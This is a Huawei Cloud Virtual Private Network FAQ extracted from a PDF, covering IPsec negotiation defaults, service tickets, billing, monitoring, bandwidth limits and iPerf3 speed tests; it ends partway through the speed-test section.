virtual private network - huawei cloud

105
Virtual Private Network FAQ Issue 01 Date 2021-08-30 HUAWEI TECHNOLOGIES CO., LTD.

Upload: khangminh22

Post on 14-Mar-2023

0 views

Category:

Documents


0 download

TRANSCRIPT

Virtual Private Network

FAQ

Issue 01

Date 2021-08-30

HUAWEI TECHNOLOGIES CO., LTD.

Copyright © Huawei Technologies Co., Ltd. 2022. All rights reserved.

No part of this document may be reproduced or transmitted in any form or by any means without priorwritten consent of Huawei Technologies Co., Ltd. Trademarks and Permissions

and other Huawei trademarks are trademarks of Huawei Technologies Co., Ltd.All other trademarks and trade names mentioned in this document are the property of their respectiveholders. NoticeThe purchased products, services and features are stipulated by the contract made between Huawei andthe customer. All or part of the products, services and features described in this document may not bewithin the purchase scope or the usage scope. Unless otherwise specified in the contract, all statements,information, and recommendations in this document are provided "AS IS" without warranties, guaranteesor representations of any kind, either express or implied.

The information in this document is subject to change without notice. Every effort has been made in thepreparation of this document to ensure accuracy of the contents, but all statements, information, andrecommendations in this document do not constitute a warranty of any kind, express or implied.

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. i

Contents

1 General Questions................................................................................................................... 11.1 What Devices Can Be Connected to HUAWEI CLOUD Through a VPN?............................................................. 11.2 What Are VPN Negotiation Parameters? What Are Their Default Values?........................................................ 21.3 What Are the Categories of VPN Service Tickets? How Do I Create a VPN Service Ticket?......................... 31.4 Can I Deploy Applications on the Cloud, Databases in an On-premises Data Center, and Then ConnectThem Through a VPN?................................................................................................................................................................. 51.5 Can I Visit Websites Across International Borders Using a VPN?........................................................................... 51.6 What Is a VPN Connection? How Do I Set the Number of VPN Connections When Buying a VPNGateway?........................................................................................................................................................................................... 51.7 Will I Be Notified If a VPN Connection Is Interrupted?..............................................................................................61.8 Are a Username and Password Required for Creating an IPsec VPN Connection?.......................................... 71.9 What Are the Differences Between the Application Scenarios and Connection Modes of IPsec and SSLVPNs?.................................................................................................................................................................................................. 71.10 Will an IPsec VPN Connection Be Established Automatically?............................................................................. 81.11 What Will I Be Billed for Creating a VPN? Will I Be Billed for VPN Gateway IP Addresses?......................81.12 Can a VPN Gateway IP Address Be Retained After the VPN Gateway Is Deleted? ...................................... 91.13 Which VPN Resources Can Be Monitored?.................................................................................................................. 91.14 Which Direction of the Bandwidth Is Limited and What Is the Unit of the Bandwidth?..........................101.15 What Is the Actual VPN Connection Network Speed?.......................................................................................... 101.16 Can a VPN Billed by Traffic Use a Shared Data Package?................................................................................... 121.17 What Are the Relationships Between a VPC, a VPN Gateway, and a VPN Connection?...........................121.18 What Is a Remote Gateway and Remote Subnet in a VPN Connection?....................................................... 121.19 How Many VPN Connections Do I Need to Connect to Multiple Servers in a Data Center?.................. 131.20 Does a VPN Allow for Communications Between Two VPCs?............................................................................131.21 What Are the Impacts of a VPN on an On-premises Network? What Are the Changes to the Routefor Accessing an ECS?................................................................................................................................................................. 131.22 Can I Use a Network with Two Egresses to Establish Two VPN Connections with the Same VPC?......141.23 How Can I Prevent VPN Connection Interruption?.................................................................................................141.24 Why Is Not Connected Displayed as the Status for a Successfully Created VPN?.......................................151.25 What Can I Do If VPN Connection Setup Fails?.......................................................................................................151.26 Can an EIP Be Used as a VPN Gateway IP Address?..............................................................................................161.27 Why Is the VPN Connection Always in the Not Connected State Even After Its Configuration IsComplete?....................................................................................................................................................................................... 161.28 Do I Need to Configure ACL Rules on the HUAWEI CLOUD Management Console After I ConfiguredACL Rules on the Gateway Device of the On-premises Data Center?...................................................................... 17

Virtual Private NetworkFAQ Contents

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. ii

2 Product Consultation............................................................................................................182.1 What Are the Applicable Scenarios of IPsec VPN?....................................................................................................182.2 What Is a VPC, VPN Gateway, and a VPN Connection?.......................................................................................... 192.3 What Are the Relationships Between a VPC, a VPN Gateway, and a VPN Connection?............................. 192.4 What Is a VPN Connection? How Do I Set the Number of VPN Connections When Buying a VPNGateway?........................................................................................................................................................................................ 192.5 What Is a Remote Gateway and Remote Subnet in a VPN Connection?..........................................................202.6 How Do I Plan the CIDR Block of a VPC Accessed over a VPN Connection?...................................................212.7 Will an IPsec VPN Connection Be Established Automatically?............................................................................. 212.8 What Are the Categories of VPN Service Tickets? How Do I Create a VPN Service Ticket?.......................212.9 What Devices Can Be Connected to HUAWEI CLOUD Through a VPN?........................................................... 232.10 What Are VPN Negotiation Parameters? What Are Their Default Values?................................................... 242.11 Are a Username and Password Required for Creating an IPsec VPN Connection?..................................... 252.12 How Do I Allow Specific Servers to Access a Subnet on the Cloud Through a Created VPNConnection?................................................................................................................................................................................... 252.13 Which VPN Resources Can Be Monitored?................................................................................................................ 262.14 Can an EIP Be Used as a VPN Gateway IP Address?..............................................................................................262.15 Do I Need to Purchase an EIP for Servers That Communicate with Each Other Through a VPN?....... 262.16 Are SSL VPNs Supported?................................................................................................................................................ 262.17 How Long Does It Take for Delivered VPN Configurations to Take Effect?...................................................272.18 What Should I Do If I Cannot Create Connections for a VPN Gateway That Has No BandwidthInformation?.................................................................................................................................................................................. 272.19 Does HUAWEI CLOUD VPN Support IPv6 Addresses?...........................................................................................272.20 How Do I Determine My VPN Bandwidth Size?...................................................................................................... 272.21 Does a VPN Connection Support Chinese Encryption Algorithms?.................................................................. 282.22 Which IKE Version Should I Select When I Create a VPN Connection?...........................................................282.23 What Are the Bits of the DH Groups Used by HUAWEI CLOUD VPN?............................................................302.24 Can I Visit Websites Across International Borders Using a VPN?...................................................................... 312.25 Can I Deploy Applications on the Cloud, Databases in an On-premises Data Center, and ThenConnect Them Through a VPN?............................................................................................................................................. 312.26 What Are the Differences Between the Application Scenarios and Connection Modes of IPsec andSSL VPNs?....................................................................................................................................................................................... 312.27 What Will I Be Billed for Creating a VPN? Will I Be Billed for VPN Gateway IP Addresses?................... 322.28 What Is the Difference Between Billing a VPN Gateway by Bandwidth and by Traffic?.......................... 322.29 Can a VPN Billed by Traffic Use a Shared Data Package?................................................................................... 332.30 Can a VPN Gateway IP Address Be Retained After the VPN Gateway Is Deleted? ....................................332.31 Do I Need to Purchase an EIP for Servers That Communicate with Each Other Through a VPN?....... 332.32 Where Can I Add a Route to Reach the Remote Subnet on the VPN Console?...........................................332.33 Will I Be Notified If a VPN Connection Is Interrupted?......................................................................................... 332.34 What Can I Do If VPN Connection Setup Fails?.......................................................................................................342.35 Which Direction of the Bandwidth Is Limited and What Is the Unit of the Bandwidth?..........................34

3 Networking and Application Scenarios........................................................................... 363.1 Can I Visit Websites Across International Borders Using a VPN?........................................................................ 36

Virtual Private NetworkFAQ Contents

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. iii

3.2 Can I Deploy Applications on the Cloud, Databases in an On-premises Data Center, and Then ConnectThem Through a VPN?............................................................................................................................................................... 363.3 How Many VPN Connections Do I Need to Connect to Multiple Servers in a Data Center?.....................373.4 Do I Need to Install the IPsec Software on Each Server That Needs to Access an ECS to Establish aVPN Connection?..........................................................................................................................................................................373.5 What Are the Differences Between the Application Scenarios and Connection Modes of IPsec and SSLVPNs?............................................................................................................................................................................................... 373.6 Does a VPN Allow for Communications Between Two VPCs?.............................................................................. 383.7 What Are the Impacts of a VPN on an On-premises Network? What Are the Changes to the Route forAccessing an ECS?........................................................................................................................................................................ 383.8 What Configurations Are Required on Both Ends of a VPN to Implement the Communication Betweena Customer Data Center and a VPC?.................................................................................................................................... 393.9 Can I Use a Network with Two Egresses to Establish Two VPN Connections with the Same VPC?........ 393.10 Can I Connect Two VPCs in the Same Region Through a VPN?........................................................................ 393.11 How Can I Connect Two VPCs in the Same Region?............................................................................................. 403.12 How Do I Replace a Direct Connect Connection with a VPN?........................................................................... 403.13 How Do I Enable Communication Among Two VPCs and an IDC Network?................................................ 403.14 How Do I Connect Four Subnets?.................................................................................................................................413.15 Do I Need Two VPN Connections to Connect Four Subnets of Two Regions If Each Region Has TwoSubnets?.......................................................................................................................................................................................... 413.16 Can I Access OBS Through a VPN?.............................................................................................................................. 423.17 How Do I Interconnect My Personnel Computer with a VPN?...........................................................................423.18 How Do I Access HUAWEI CLOUD ECSs From Home After My Enterprise Network Is Connected toHUAWEI CLOUD Through a VPN?......................................................................................................................................... 423.19 How Do I Create a VPN Connection Temporarily If No Device That Supports IPsec Is Available off theCloud After I Purchase HUAWEI CLOUD VPN Gateway and Connections?.............................................................423.20 How Do I Select a Proper Region on the Cloud When Creating a VPN Gateway?..................................... 43

4 Billing and Payments............................................................................................................444.1 What Will I Be Billed for Creating a VPN? Will I Be Billed for VPN Gateway IP Addresses?......................444.2 What Is the Difference Between Billing a VPN Gateway by Bandwidth and by Traffic?............................ 444.3 Can a VPN Billed by Traffic Use a Shared Data Package?..................................................................................... 454.4 How Many VPN Connections Will I Be Charged to Connect VPCs in Different Regions?........................... 454.5 When Will VPN Resources Be Frozen? How Can I Unfreeze VPN Resources?.................................................45

5 Related Operations on the Console..................................................................................465.1 What Are the Relationships Between a VPC, a VPN Gateway, and a VPN Connection?............................. 465.2 How Long Does It Take for Delivered VPN Configurations to Take Effect?..................................................... 465.3 Why Is the VPN Connection Always in the Not Connected State Even After Its Configuration IsComplete?....................................................................................................................................................................................... 475.4 Can a VPN Gateway IP Address Be Retained After the VPN Gateway Is Deleted? ...................................... 475.5 Do I Need to Create a VPN Gateway or a VPN Connection for Creating a VPN? Which InformationAbout a Created VPN Can Be Modified?............................................................................................................................. 475.6 Do I Need to Configure ACL Rules on the HUAWEI CLOUD Management Console After I ConfiguredACL Rules on the Gateway Device of the On-premises Data Center?...................................................................... 485.7 What Do I Do If an Exception Occurs When I Add a Remote Subnet During VPN Connection Creation?............................................................................................................................................................................................................ 48

Virtual Private NetworkFAQ Contents

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. iv

5.8 Where Can I Add a Route to Reach the Remote Subnet on the VPN Console?............................................. 485.9 Can I Performed Operations on HUAWEI CLOUD VPNs Using APIs?.................................................................485.10 What Is a Remote Gateway and Remote Subnet in a VPN Connection?....................................................... 495.11 How Do I Disable the PFS Function When Creating a VPN Connection?.......................................................495.12 What Is the Limitation on the Number of Local and Remote Subnets of a VPN? Why Is an ErrorMessage Displayed When I Update the Local Subnet by Specifying a CIDR Block?............................................ 495.13 What Are the Precautions for Configuring the Local and Remote Subnets of a VPN Connection?......505.14 Why the Status of a VPN Connection Is Not Connected on the Management Console When It IsAlready Available?....................................................................................................................................................................... 505.15 What Do I Do If a Message Is Displayed Indicating That the VPN Connection Does Not Exist AfterNegotiation Policies Are Modified?........................................................................................................................................505.16 What Should I Do If I Cannot Create Connections for a VPN Gateway That Has No BandwidthInformation?.................................................................................................................................................................................. 515.17 How Do I Reset a VPN Connection?............................................................................................................................ 515.18 What Is the Maximum Bandwidth Supported by a VPN Gateway?................................................................. 515.19 Which IKE Version Should I Select When I Create a VPN Connection?...........................................................515.20 What Are the Categories of VPN Service Tickets? How Do I Create a VPN Service Ticket?.................... 535.21 Are a Username and Password Required for Creating an IPsec VPN Connection?..................................... 555.22 Which VPN Resources Can Be Monitored?................................................................................................................ 555.23 Will I Be Notified If a VPN Connection Is Interrupted?......................................................................................... 56

6 VPN Negotiation and Interconnection.............................................................................576.1 What Devices Can Be Connected to HUAWEI CLOUD Through a VPN?........................................................... 576.2 What Are VPN Negotiation Parameters? What Are Their Default Values?......................................................586.3 Will an IPsec VPN Connection Be Established Automatically?............................................................................. 596.4 How Do I Configure a VPN for a Device in a Data Center? (Configuring the VPN on a HuaweiUSG6600 Series Firewall).......................................................................................................................................................... 606.5 How Should I Configure Gateway Device of the Customer Data Center When I Use a VPN to Connectto the Cloud?................................................................................................................................................................................. 616.6 Can HUAWEI CLOUD VPN Connect to a Remote Gateway Through a Domain Name?............................. 626.7 How Many Tunnels Does My VPN Connection Have?.............................................................................................626.8 How Do I Allow Specific Servers to Access a Subnet on the Cloud Through a Created VPNConnection?................................................................................................................................................................................... 626.9 Do HUAWEI CLOUD VPNs Have the DPD Mechanism Enabled?........................................................................ 626.10 How Can I Use Security Groups to Prevent ECSs in a VPC From Being Accessed Through a VPN toImplement Security Isolation?................................................................................................................................................. 636.11 Will a VPN Connection Be Reestablished After Its Configuration Is Modified?............................................636.12 Why Cannot I Initiate Negotiation from Amazon Web Services to HUAWEI CLOUD After They AreInterconnected?............................................................................................................................................................................ 646.13 How Do I Configure DPD for Interconnecting with HUAWEI CLOUD?........................................................... 646.14 What Should I Do If My Firewall Cannot Receive Response Packets of IKE Phase 1 from the HUAWEICLOUD VPN Gateway?............................................................................................................................................................... 646.15 What Should I Do If My Firewall Cannot Receive Response Packets from the HUAWEI CLOUD VPNSubnet?............................................................................................................................................................................................ 656.16 What Are the Bits of the DH Groups Used by HUAWEI CLOUD VPN?............................................................65

7 Connection or Ping Failure..................................................................................................67

Virtual Private NetworkFAQ Contents

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. v

7.1 Why Is the VPN Connection Always in the Not Connected State Even After Its Configuration IsComplete?....................................................................................................................................................................................... 677.2 How Can I Prevent VPN Connection Interruption?................................................................................................... 677.3 How Do I Quickly Restore an Interrupted IPsec VPN Connection?..................................................................... 697.4 What Happens If the Bandwidth of a VPN Gateway Exceeds the Size Specified When I Create theGateway?........................................................................................................................................................................................ 697.5 Will an IPsec VPN Connection Be Established Automatically?............................................................................. 707.6 Why Cannot a Peer ECS Be Pinged Even the Status of the VPN Connection Created Between the TwoRegions Is Normal?......................................................................................................................................................................707.7 Why Subnets Cannot Access Each Other When the IDC and the Cloud Are Interconnected and theVPN Connection Is Normal?..................................................................................................................................................... 707.8 What Do I Do If a VPN Connection In Use Is Interrupted and a Message Is Displayed Indicating ThatTraffic from IP Addresses Not Whitelisted Generates?................................................................................................... 717.9 What Do I Do If a VPN Connection Is Interrupted and a Message Is Displayed Indicating That the DPDTimes Out?..................................................................................................................................................................................... 717.10 Why the Status of a VPN Connection Is Not Connected on the Management Console When It IsAlready Available?....................................................................................................................................................................... 717.11 Will I Be Notified If a VPN Connection Is Interrupted?......................................................................................... 727.12 What Can I Do If VPN Connection Setup Fails?.......................................................................................................727.13 What Should I Do If I Cannot Access the ECSs on the Cloud from My Data Center or LAN Even If theVPN Connection Has Been Set Up?....................................................................................................................................... 737.14 Why Is Not Connected Displayed as the Status for a Successfully Created VPN?.......................................737.15 Do HUAWEI CLOUD VPNs Have the DPD Mechanism Enabled?...................................................................... 73

8 EIPs............................................................................................................................................758.1 Can a VPN Gateway IP Address Be Retained After the VPN Gateway Is Deleted? ...................................... 758.2 Can an EIP Be Used as a VPN Gateway IP Address?................................................................................................ 758.3 Do I Need to Purchase an EIP for Servers That Communicate with Each Other Through a VPN?..........758.4 Why Does an ECS Have EIP Access Information After I Enable a VPN?............................................................768.5 Can the Gateway of a Customer Data Center Have No Fixed Public IP Address?.........................................76

9 Route Configurations........................................................................................................... 779.1 What Is a Remote Gateway and Remote Subnet in a VPN Connection?..........................................................779.2 Where Can I Add a Route to Reach the Remote Subnet on the VPN Console?............................................. 779.3 Do I Need to Add a Route to Reach the Customer Data Center Network for an ECS with MultipleNICs?................................................................................................................................................................................................. 77

10 Subnet Setting..................................................................................................................... 7810.1 What Are the Precautions for Configuring the Local and Remote Subnets of a VPN Connection?......7810.2 What Is the Limitation on the Number of Local and Remote Subnets of a VPN? Why Is an ErrorMessage Displayed When I Update the Local Subnet by Specifying a CIDR Block?............................................ 7810.3 What Do I Do If an Exception Occurs When I Add a Remote Subnet During VPN ConnectionCreation?......................................................................................................................................................................................... 7910.4 Can a VPN Gateway IP Address Be Retained After the VPN Gateway Is Deleted? ....................................7910.5 How Do I Plan the CIDR Block of a VPC Accessed over a VPN Connection?................................................ 7910.6 How Is a VPN Gateway IP Address Allocated?.........................................................................................................79

11 VPN Interesting Traffic...................................................................................................... 81

Virtual Private NetworkFAQ Contents

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. vi

11.1 Do I Need to Configure ACL Rules on the HUAWEI CLOUD Management Console After I ConfiguredACL Rules on the Gateway Device of the On-premises Data Center?...................................................................... 8111.2 How Do I Configure and Modify the Interesting Traffic of a VPN on the Cloud?.......................................81

12 Keeping VPN Connection Alive........................................................................................8212.1 How Can I Prevent VPN Connection Interruption?.................................................................................................82

13 Monitoring............................................................................................................................ 8413.1 Which VPN Resources Can Be Monitored?................................................................................................................ 8413.2 Will I Be Notified If a VPN Connection Is Interrupted?......................................................................................... 8413.3 Can I View the Traffic of Each VPN Connection?....................................................................................................8513.4 Will I Be Notified When the VPN Monitoring Result Is Abnormal?..................................................................85

14 Bandwidth and Network Speed...................................................................................... 8914.1 What Is the Actual VPN Connection Network Speed?.......................................................................................... 8914.2 Which Direction of the Bandwidth Is Limited and What Is the Unit of the Bandwidth?..........................9114.3 How Do I Change the VPN Bandwidth Size?............................................................................................................9114.4 What Happens If the Bandwidth of a VPN Gateway Exceeds the Size Specified When I Create theGateway?........................................................................................................................................................................................ 9114.5 Why Does the VPN Bandwidth Change Not Take Effect?.................................................................................... 9114.6 Can a VPN Share Bandwidth with an EIP?................................................................................................................ 9214.7 What Are the Differences Between the Bandwidth of a VPN Connection and that of a Direct ConnectConnection?................................................................................................................................................................................... 9214.8 How Do I Determine My VPN Bandwidth Size?...................................................................................................... 92

15 Quotas................................................................................................................................... 9315.1 What Is the VPN Quota?................................................................................................................................................. 9315.2 How Many VPN Gateways and VPN Connections Can I Create By Default?................................................ 9415.3 How Do I Change My VPN Gateway and Connection Quotas?......................................................................... 9415.4 How Many IPsec VPNs Can I Have?.............................................................................................................................95

16 Account Permissions...........................................................................................................9616.1 Are a Username and Password Required for Creating an IPsec VPN Connection?..................................... 9616.2 What Should I Do If the System Displays a Message Indicating That I Do Not Have the Permissionsto Create a VPN?.......................................................................................................................................................................... 9616.3 How Do I Determine that My Account Cannot Create a VPN Due to Insufficient Permissions?........... 96

Virtual Private NetworkFAQ Contents

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. vii

1 General Questions

1.1 What Devices Can Be Connected to HUAWEICLOUD Through a VPN?

HUAWEI CLOUD VPN supports the standard IPsec protocol. Devices in your datacenter can connect to HUAWEI CLOUD if the following requirements are met:

● Devices support IPsec VPN.● Your data center has a fixed public IP address or an IP address obtained after

performing NAT mapping on a fixed public IP address.

Devices are mostly routers and firewalls. For details about the interconnectionconfiguration, see Administrator Guide.

NO TE

● Common home broadband routers, personal mobile terminals, and VPN services (suchas L2TP) provided by Windows hosts cannot interconnect with HUAWEI CLOUD VPN.

● Devices that can interconnect with the HUAWEI CLOUD VPN service are usually fromthe following:● Vendors such as Huawei (routers and firewalls), H3C (routers and firewalls), Cisco

(routers and firewalls), Ruijie (routers and firewalls), ZTE, Sangfor, Fortinet, 360,Topsec, Hillstone, NetentSec, NSFOCUS, DELL, ZyXEL, and Juniper

● Cloud service providers such as Alibaba Cloud, Tencent Cloud, and Amazon WebServices

● Software vendors such as Openswan, strongSwan, and GreenBow● The IPsec protocol is a standard IETF protocol. Devices that support IPsec can

interconnect with HUAWEI CLOUD.Most enterprise-level routers and firewalls support IPsec protocol.

● However, some devices support IPsec VPN only after you purchase required softwarelicenses.Contact the data center administrator to confirm the device model with the vendor.

Virtual Private NetworkFAQ 1 General Questions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 1

1.2 What Are VPN Negotiation Parameters? What AreTheir Default Values?

Table 1-1 VPN negotiation parameters

Policy Parameter Value

IKE AuthenticationAlgorithm

SHA2-256 (default), SHA1, MD5,SHA2-384, and SHA2-512

EncryptionAlgorithm

AES-128 (default), AES-192, AES-256,and 3DES

DH Algorithm Group 14 (default), Group 1, Group 2,Group 5, Group 15, Group 16, Group19, Group 20, and Group 21NOTE

In some regions, only Group 14, Group 2,and Group 5 are available.

Version v2 (default) and v1

Lifecycle (s) 86400 (default)Unit: SecondValue range: 60 to 604800

Negotiation Mode Main (default) and AggressiveThis parameter is mandatory whenVersion is set to v1.

IPsec AuthenticationAlgorithm

SHA2-256 (default), SHA1, MD5,SHA2-384, and SHA2-512

EncryptionAlgorithm

AES-128 (default), AES-192, AES-256,and 3DES

PFS DH group 14 (default), DH group 1,DH group 2, DH group 5, DH group15, DH group 16, DH group 19, DHgroup 20, DH group 21, or DisableNOTE

In some regions, only DH group 14, DHgroup 2, and DH group 5 are available.

Transfer Protocol ESP (default), AH, and AH-ESP

PacketEncapsulationMode

TUNNEL

Virtual Private NetworkFAQ 1 General Questions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 2

Policy Parameter Value

Lifecycle (s) 3600 (default)Unit: SecondValue range: 480 to 604800

NO TE

● Perfect Forward Secrecy (PFS) is a security feature.IKE negotiation has two phases, phase one and phase two. The key of phase two (IPsecSA) is derived from the key generated in phase one. Once the key in phase one isdisclosed, the security of the IPsec VPN may be adversely affected. To improve the keysecurity, IKE provides the PFS function. After PFS is turned on, an additional DHexchange will be performed during IPsec SA negotiation, and a new IPsec SA key will begenerated, improving IPsec SA security.

● To ensure security, PFS is enabled on HUAWEI CLOUD by default. Ensure that PFS is alsoenabled on the gateway in your on-premises data center. Otherwise, the negotiation willfail.

● To enable PFS, ensure that the configurations on both ends of a VPN are the same.● The traffic-based lifetime of IPsec SA on the HUAWEI CLOUD VPN is default to

1,843,200 KB and cannot be changed. This lifetime does not affect the establishment ofan IPsec SA.

1.3 What Are the Categories of VPN Service Tickets?How Do I Create a VPN Service Ticket?

1. Log in to the management console.2. In the upper right corner of the management console, choose Service Tickets

> Create Service Ticket.

Figure 1-1 Create Service Ticket

3. Search for VPN and select Virtual Private Network (VPN).

Virtual Private NetworkFAQ 1 General Questions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 3

Figure 1-2 Selecting Virtual Private Network (VPN)

4. Select the service ticket type.

Figure 1-3 Selecting the service ticket type

NO TE

When you submit a service ticket, select a ticket type to facilitate problem handling.

Figure 1-4 Ticket category and classification basis

Virtual Private NetworkFAQ 1 General Questions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 4

1.4 Can I Deploy Applications on the Cloud, Databasesin an On-premises Data Center, and Then ConnectThem Through a VPN?

VPN connects a VPC and an on-premises network.

After the VPN is set up successfully, the VPC and the on-premises network cancommunicate with each other. In this case, the application server accessing thedatabase is just the same as accessing other servers in the same LAN.

Servers on the cloud and those in the data center can communicate with eachother.

NO TICE

● After a VPN is set up, check whether the network latency and packet lossadversely affect service running.

● It is recommended that you run the ping command to check the packet lossand network latency details.

1.5 Can I Visit Websites Across International BordersUsing a VPN?

No.

VPN connects a VPC and the network of an on-premises data center, that is, site-to-site connection.

1.6 What Is a VPN Connection? How Do I Set theNumber of VPN Connections When Buying a VPNGateway?

A HUAWEI CLOUD VPN connection is an IPsec connection established between aVPN gateway on the cloud and an independent public IP address of an on-premises data center. You can configure multiple local subnets (subnets in theVPC) and remote subnets (subnets on the on-premises network) for oneconnection.

The number of VPN connections to be created is determined by the number ofdata centers. Each VPN connection can connect a VPC to one data center.

If you choose to buy a yearly/monthly VPN gateway, set the number of VPNconnections based on the number of data centers to be connected.

Virtual Private NetworkFAQ 1 General Questions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 5

NO TE

For example, if CIDR blocks a1 and a2 on HUAWEI CLOUD need to communicate with CIDRblocks b1 and b2 on the on-premises network, one VPN connection is enough. You onlyneed to set Local Subnet to a1,a2 and Remote Subnet to b1,b2 when creating a VPNconnection. The following figure shows an example.

1.7 Will I Be Notified If a VPN Connection IsInterrupted?

The VPN connection status can be monitored. After a VPN connection is created,the VPN service reports the connection status information to Cloud Eye, but doesnot automatically send alarm notifications to you. To receive notifications, createalarm rules and enable Alarm Notifications on the Cloud Eye console.

After a VPN connection is created, you can locate the row that contains the VPNconnection and choose Operation > View Metric to view the VPN connectionstatus.

Virtual Private NetworkFAQ 1 General Questions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 6

Figure 1-5 View Metric

1.8 Are a Username and Password Required forCreating an IPsec VPN Connection?

No. HUAWEI CLOUD IPsec VPN uses a pre-shared key (PSK) for authentication.The key is configured on a VPN gateway. A tunnel will be established after VPNnegotiation is complete. Therefore, usernames and passwords are not required.

Generally, SSL, PPTP, and L2TP VPNs use usernames and passwords forauthentication.

NO TE

IPsec XAUTH is an extended technology of IPsec VPN. It prompts users to enter theirusernames and passwords during VPN negotiation.

HUAWEI CLOUD VPN does not support IPsec XAUTH.

1.9 What Are the Differences Between the ApplicationScenarios and Connection Modes of IPsec and SSLVPNs?

Scenarios

IPsec VPN connects two LANs, such as a branch and its headquarter, or a local IDCand a VPC.

SSL VPN connects a client to a LAN. For example, the portable computer of anemployee on a business trip accesses the internal network of the company.

Connection Modes

IPsec VPN requires fixed gateways, such as firewalls or routers, at both ends. Theadministrator needs to configure gateways at both ends to complete IPsec VPNnegotiation.

SSL VPN needs to install a specified client software on the server to connect to theSSL device through the username and password.

Virtual Private NetworkFAQ 1 General Questions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 7

NO TE

HUAWEI CLOUD only supports IPsec VPNs.

1.10 Will an IPsec VPN Connection Be EstablishedAutomatically?

After you complete the configurations on both ends of an IPsec VPN connection,the VPN connection will not be automatically established only after data flowsbetween the two ends of the connection. If no data flows between the cloud andthe on-premises data center, the VPN connection will always be in the down state.Any data generated by accessing or pinging between servers can trigger theestablishment of a VPN connection.

The establishment of a VPN connection can be triggered either through thegateways of the VPN connection or by the traffic between servers on the cloudand in an on-premises data center.

However, automatic establishment of a VPN connection cannot be triggered by aVPN gateway on HUAWEI CLOUD. Verify that the establishment of your VPNconnection can be triggered by the data flows between the two ends of the VPNconnection. That is, check whether a VPN connection can be established after youping a server on the cloud from a server in the on-premises data center, andwhether a VPN connection can be established after you disconnect the connectionand ping a server in the on-premises data center from a server on the cloud.

NO TE

The source and destination addresses of the ping packets must be protected by the VPN.

Before a VPN connection is established, the gateway IP addresses of both ends can bepinged. However, pinging the gateway IP addresses does not trigger the establishment ofthe VPN connection.

1.11 What Will I Be Billed for Creating a VPN? Will I BeBilled for VPN Gateway IP Addresses?

VPNs are billed on a yearly/monthly or pay-per-use basis. You need to pay forboth the VPN gateway bandwidth or traffic price and the VPN connection price.

VPN gateways can be billed by traffic or bandwidth.

Virtual Private NetworkFAQ 1 General Questions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 8

1. A yearly/monthly VPN gateway can only be billed by bandwidth. The price ofa yearly/monthly VPN gateway includes the price of the VPN connections thatcan be created for the gateway and the bandwidth price.

2. The billing cycle of the pay-per-use billing mode is one hour. If you choose apay-per-use VPN gateway, a VPN connection must be purchased togetherwith the VPN gateway. The price includes the VPN gateway bandwidth ortraffic price and the price of the VPN connection created together with thegateway. If you create another connection for the gateway, you will becharged for the additional connection.

NO TE

● The IP address of the VPN gateway will not be billed.

● A VPN gateway cannot share a bandwidth with an EIP bound to an ECS.

1.12 Can a VPN Gateway IP Address Be Retained Afterthe VPN Gateway Is Deleted?

No. The VPN gateway IP address will be released after the VPN gateway isdeleted.

Deleting a VPN gateway will also delete the resources associated with thegateway.

NO TICE

Deleting the last connection of a pay-per-use VPN gateway will also delete thegateway. If you want to retain the IP address, do not delete the last VPNconnection.

1.13 Which VPN Resources Can Be Monitored?VPN Gateway

Bandwidth information that can be monitored includes inbound traffic, inboundbandwidth, outbound traffic, outbound bandwidth, and outbound bandwidthusage.

To view VPN gateway metrics, locate the target VPN gateway and click ViewMetric in the Operation column.

VPN Connection

The VPN connection status can be monitored.

Value 1 indicates that the connection is normal.

Value 0 indicates that the connection is not connected.

To view the VPN connection status, locate the target VPN connection and clickView Metric in the Operation column.

Virtual Private NetworkFAQ 1 General Questions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 9

1.14 Which Direction of the Bandwidth Is Limited andWhat Is the Unit of the Bandwidth?

Your purchased VPN gateway bandwidth is used in the outbound direction. Tobalance the traffic in the inbound and outbound directions, the bandwidth in theinbound direction is limited.

● If the purchased bandwidth is less than or equal to 10 Mbit/s, the bandwidthin the inbound direction is limited to 10 Mbit/s.

● If the purchased bandwidth is more than 10 Mbit/s, the bandwidth in theinbound direction is the same as that of the purchased bandwidth.

The unit of bandwidth is Mbit/s and that of traffic is GB.

1.15 What Is the Actual VPN Connection NetworkSpeed?

A VPN connection has been created. Two ECSs have been created with one at thelocal side and the other at the remote side. The two ECSs can ping each other.

Perform the following steps to test the VPN gateway network speed if thebandwidth of your VPN gateway is 200 Mbit/s:

1. If the ECSs at the two sides of the VPN run Windows, use iPerf3 and FileZilla(a free FTP application for file uploading and downloading) to test thenetwork speed.

NO TE

The test shows that the average VPN network speed is 180 Mbit/s, and there is about10% network speed deviation. The TCP and FTP protocols have the congestion controlmechanism, and the IPsec protocol adds a new IP header. Therefore, about 10%network speed deviation is normal for the VPN network.

Figure 1-6 shows the result of the test performed using the iPerf3 client.

Figure 1-6 Test result for 200 Mbit/s bandwidth (iPerf3 client)

Virtual Private NetworkFAQ 1 General Questions

Issue 01 (2021-08-30) Copyright © Huawei Technologies Co., Ltd. 10

Figure 1-7 shows the result of the test performed using the iPerf3 server.

Figure 1-7 Test result for 200 Mbit/s bandwidth (iPerf3 server)

2. If the ECSs at the two sides of the VPN run CentOS 7, use iPerf3 to test thenetwork speed. The network speed can reach 180 Mbit/s.

3. If the ECS functioning as the server runs CentOS 7, and the ECS functioning asthe client runs Windows, use iPerf3 and FileZilla to test the network speed.The network speed is about 20 Mbit/s. The reason is that TCPimplementations on Windows and that on Linux are different, which causesthe slow network speed. Therefore, if the ECSs at the two sides of the VPNuse different OSs, the VPN network speed does not meet the bandwidthrequirements.Figure 1-8 shows the result of the test performed using iPerf3.

